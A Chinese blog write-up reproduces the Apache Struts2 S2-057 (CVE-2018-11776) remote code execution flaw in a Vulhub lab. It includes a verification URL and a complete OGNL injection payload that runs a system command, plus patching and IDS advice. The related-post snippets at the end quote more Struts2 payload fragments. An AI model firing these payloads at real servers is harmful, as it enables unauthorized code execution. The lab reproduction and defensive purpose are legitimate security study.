struts2漏洞_Apache Struts2057远程代码执行漏洞复现

最新推荐文章于 2024-08-07 15:16:36 发布
最新推荐文章于 2024-08-07 15:16:36 发布
阅读量229 收藏 1
点赞数
文章标签: struts2漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39661129/article/details/111369124
版权
本文介绍了Apache Struts2的S2-057高危远程代码执行漏洞,详细说明了漏洞产生的原因、受影响的版本以及复现步骤。同时,提供了漏洞利用的Payload和防护措施,包括升级Struts2版本、保障代码安全以及IDS规则的调整。
摘要由CSDN通过智能技术生成

网安引领时代,弥天点亮未来   

7cf5738cbd46667ca2a8c83f58f6670b.png 0x00漏洞简述

2018年8月22日,Apache Strust2发布最新安全公告,Apache Struts2存在远程代码执行的高危漏洞(S2-057/CVE-2018-11776)。该漏洞是由于在Struts2开发框架中使用namespace功能定义XML配置时,namespace值未被设置且在上层动作配置(Action Configuration)中未设置或用通配符namespace,可能导致远程代码执行。同理,url标签未设置value和action值且上层动作未设置或用通配符namespace时也可能导致远程代码执行

7cf5738cbd46667ca2a8c83f58f6670b.png 0x01影响版本

Apache Struts2.3–Struts 2.3.34, Struts 2.5– Struts 2.5.16

7cf5738cbd46667ca2a8c83f58f6670b.png 0x02漏洞复现

虚拟机部署docker安装Vulhub一键搭建漏洞测试靶场环境。

docker-compose up -d

1、访问漏洞环境

388bf11b4015d4826bd6a4b8b8d14b6d.png

2、访问/showcase路径到Struts2测试页

http://192.168.60.131:8080/showcase

862eb83100d1a29124894c52b992a881.png

3、Payload验证漏洞是否存在

http://192.168.60.131:8080/struts2-showcase/$%7B9*9%7D/actionChain1.action

2227229f2c289eb2415c09c3dc0ba0bc.png

返回结果

4501f45e3817898b2cb0ad9f58b3442c.png

4、POC进行漏洞利用

${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec('id')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}

在利用时需要进行URL编码

07b021a2236bef0e36b54a8db2438ee0.png

命令执行

ca4410b852a4d3f94fd75a302f02493d.png

3b5ec772c34e0cf25def7b65c6ef8930.png

7cf5738cbd46667ca2a8c83f58f6670b.png 0x03修复建议

1、将ApacheStrust2版本升级到官方最新版本

2、Web应用,尽量保证代码的安全性。重点从SDL角度重视安全

3、对于IDS规则,数值计算和弹计算器返回的状态码都是302,并且Location跳转字段含有特征句柄字符串;如果是命令回显返回的200状态码,且有命令结果输出。

7cf5738cbd46667ca2a8c83f58f6670b.png 0x04参考链接

https://www.anquanke.com/post/id/157823

3023b0591affebcd9cc76dd41c19f39f.gif 

知识分享完了

喜欢别忘了关注我们哦~

予以风动,必降弥天之润!

   弥  天

安全实验室

28bf422078e54621078a2033fccdc1f2.png
weixin_39661129
关注
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052(CVE-2017-9805)
qq_51577576的博客
12-15 1493
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052(CVE-2017-9805) Apache Struts2的REST插件存在远程代码执行的高危漏洞,其编号为CVE-2017-9805(S2-052)。Struts2 REST插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患,可被远程攻击。
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞S2-008 (CVE-2012-0391)
qq_51577576的博客
10-15 1095
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞S2-008 (CVE-2012-0391) S2-008 涉及多个漏洞,主要利用对传入参数没有严格限制,导致多个地方可以执行恶意代码。 第一种情况其实就是 S2-007,在异常处理时的OGNL 执行第二种的cookie的方式,虽然在struts2没有对恶意代码进行限制,但是java的webserver(Tomcat),对cookie 的名称有较多限制,在传入struts2之前就被处理,从而较为鸡肋第三种需要开启devModedebug 模式。
Apache Strust2 的环境配置(查看servlet api/jsp api/java/jdk版本)
qq_30309257的博客
04-11 505
Apache Strust2 的环境配置如下:servlet api 2.4jsp api 2.0java 5在java web开发中,查看servlet和jsp版本方法:1、打开tomcat的安装目录,定位到common\lib目录,此目录下包含jsp-api.jar,servlet-api.jar[如果没有可能是没添加进来];2、解压这两个文件,分别用记事本打开解压目录下的META-IN...
墨者Apache Struts2远程代码执行漏洞(S2-015)题解
zr1213159840的博客
01-08 2966
这题在网上搜索后,发现是这么进行操作的 首先在地址后面添加 ${1+2}.action 即访问 http://219.153.49.228:43186/${1+2}.action 发现存在回显 然后我们构造以下信息,访问当前的文件夹,发现key.txt %24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.getDecla
Apache Struts 2框架漏洞
最新发布
qq_68186313的博客
08-07 218
漏洞产⽣于⽹站配置XML时如果没有设置namespace的值,并且上层动作配置中并没有设置 或使⽤通配符namespace时,可能会导致远程代码执⾏漏洞的发⽣。2、在url处输⼊ http://192.168.56.134:8080/struts2- showcase/ ${(123+123)}/actionChain1.action 后刷新可以看到中间数字位置相加了。1、访问IP:PORT/struts2-showcase。3、将上⾯验证payload的值修改为我们的利⽤exp。
墨者学院_Apache Struts2远程代码执行漏洞(S2-001)
cc_de_csdn的博客
08-26 780
1.由题可得漏洞为S2-001,可知用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中,所以可以直接构造 Payload 进行命令执行。 2.在密码处输入%{1+1}得到回显是2确认漏洞存在。 3.构造任意执行payload: %{ #a=(new java.lang.ProcessBuilder(new ...
struts2漏洞_【更新】Apache Struts2 远程代码执行漏洞(CVE202017530)
weixin_39897127的博客
12-16 659
漏洞名称:Apache Struts2远程代码执行漏洞(CVE-2020-17530)威胁等级:高危影响范围:Apache Struts 2.0.0 - 2.5.25漏洞类型:远程代码执行利用难度: 中等漏洞分析1Apache Struts2 组件介绍Struts2是一个基于MVC设计模式的Web应用框架。在MVC设计模式中,Struts2作为控制器(Contro...
Apache Struts2远程代码执行漏洞(S2-001)复现
oiadkt的博客
05-04 2780
Apache Struts2远程代码执行漏洞(S2-001)复现
Apache Struts2远程代码执行漏洞复现(CVE-2021-31805)
0xSec
01-12 1363
Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。
[ vulhub漏洞复现篇 ] Struts2远程代码执行漏洞S2-009 (CVE-2011-3923)
qq_51577576的博客
10-16 776
[ vulhub漏洞复现篇 ] Struts2远程代码执行漏洞S2-009 (CVE-2011-3923) Struts2框架中ParametersInterceptor拦截器只检查传入的参数名是否合法,不会检查参数值.例如传入参数top[‘foo’](0)会通过ParametersInterceptor的白名单检查,OGNL会将其解析为(top[‘foo’])(0),并将foo的值也作为OGNL表达式进行计算从而造成代码执行.
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-046(CVE-2017-5638)
qq_51577576的博客
11-20 828
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-046(CVE-2017-5638) Apache Struts2存在远程代码执行漏洞,攻击者可以将恶意代码放入http报文头部的Content-Disposition的filename字段,通 过不恰当的filename字段或者大小超过2G的Content-Length字段来触发异常,进而导致任意代码执行
Apache Struts2远程代码执行漏洞(CVE-2021-31805)安全通告
weixin_44254243的博客
04-15 6513
1. 事件描述 监测发现,开源应用框架Apache Struts存在远程代码执行漏洞(CVE-2021-31805),攻击者可构造恶意的OGNL表达式触发漏洞,实现远程代码执行。受影响版本为Apache Struts 2.0.0~2.5.29。目前,该漏洞已在Apache Struts 2.5.30版本中修复。 事件类型:漏洞利用 事件等级:高危 2. 影响范围 远程代码执行漏洞影响范围: 2.0.0<=Apache Struts <= 2.5.29 不受影响版本 Apache Struts
Apache Struts2远程代码执行漏洞(S2-004)复现总结
qq_45746681的博客
10-06 565
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、Apache Struts2远程代码执行漏洞(S2-004)复现漏洞原理漏洞复现 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、Apache Struts2远程代码执行漏洞(S2-004)复现 在这里使用墨者学院的靶场进行复现 漏洞原理 Strut
Apache Struts2远程代码执行漏洞(S2-001)复现总结
qq_45746681的博客
10-06 2152
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、Struts2远程代码执行漏洞(S2-001)复现检验方法利用漏洞进行命令执行 前言 为了加深对struts漏洞的理解,记录下复现struts漏洞的过程. 一、Struts2远程代码执行漏洞(S2-001)复现 在这里使用墨者学院的靶场进行复现 检验方法 在表格中输入%{1+1}看返回结果是否为2 返回结果都为2,证明账户和密码表格处都存在这个漏洞 利用漏洞进行命令执行 输入以下代码进行命令执行 %{ #a=(new
struts2漏洞_Apache Struts爆最新漏洞
weixin_39998859的博客
12-13 374
TAG:Struts、S2-059、CVE-2019-0230、S2-060、CVE-2019-0233漏洞危害:攻击者利用漏洞,可实现远程代码执行和拒绝服务攻击。版本:1.0漏洞公告2020年8月13日,Apache官方发布Struts 2.0.0到2.5.20版本中存在OGNL表达式注入的远程代码执行漏洞(S2-059)和拒绝服务漏洞(S2-060)公告,对应CVE编号:CVE-20...
struts2漏洞_最新!Apache Struts 又爆安全漏洞(危害程度特别大)
weixin_39952031的博客
11-27 542
Struts 是一个开源的 Java Web MVC 框架,也是 Apache 软件基金会的一个开源项目,包括 Struts 1 和 Struts 2,Struts 1 早已被淘汰,现在市面上说的 Struts 主要是指 Struts 2。很不幸,现在 Struts 2 也是被淘汰的框架了,但也有很多老项目也还是在用 Struts 2 的,所有还在用的小伙伴们需要关注一下。具体就不多说了,具体关注...
Struts2 远程代码执行漏洞复现(S2-001)
Welcome To Myon'Blog !
03-14 1200
Struts2 是一个基于 MVC 设计模式的 Web 应用框架,作为控制器来建立模型与视图的数据交互。此漏洞源于 Struts 2 框架中的一个标签处理功能:altSyntax。在开启时,支持对标签中的 OGNL 表达式进行解析并执行。Struts 2 的 “altSyntax” 功能允许将 OGNL 表达式插入到文本字符串中并递归处理,这允许恶意用户提交一个字符串,通常通过 HTML 文本字段,其中包含一个 OGNL 表达式(如 %{1+1}),如果表单验证失败,服务器将执行该表达式。
Apache Struts2漏洞复现之s2-001漏洞复现
热爱学习,喜欢折腾!
07-23 515
Apache Struts 2是一个用于开发Java EE网络应用程序的开放源代码网页应用程序架构。它利用并延伸了Java ServletAPI,鼓励开发者采用MVC架构。缘起于Apache Struts的WebWork框架,旨在提供相对于Struts框架的增强和改进,同时保留与Struts框架类似的结构。2005年12月,WebWork宣布WebWork 2.2以Apache Struts 2的名义合并至Struts。2007年2月第一个全发布(full release)版本释出。
Struts2重大漏洞CVE-2017-5638:远程代码执行风险
漏洞的关键在于远程代码执行功能,黑客可以利用这个漏洞在受害服务器上通过浏览器执行任意系统命令,从而导致一系列严重安全问题。 漏洞分析深入到了Struts2的filter机制,特别是对文件类型表单的处理过程。当用户...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值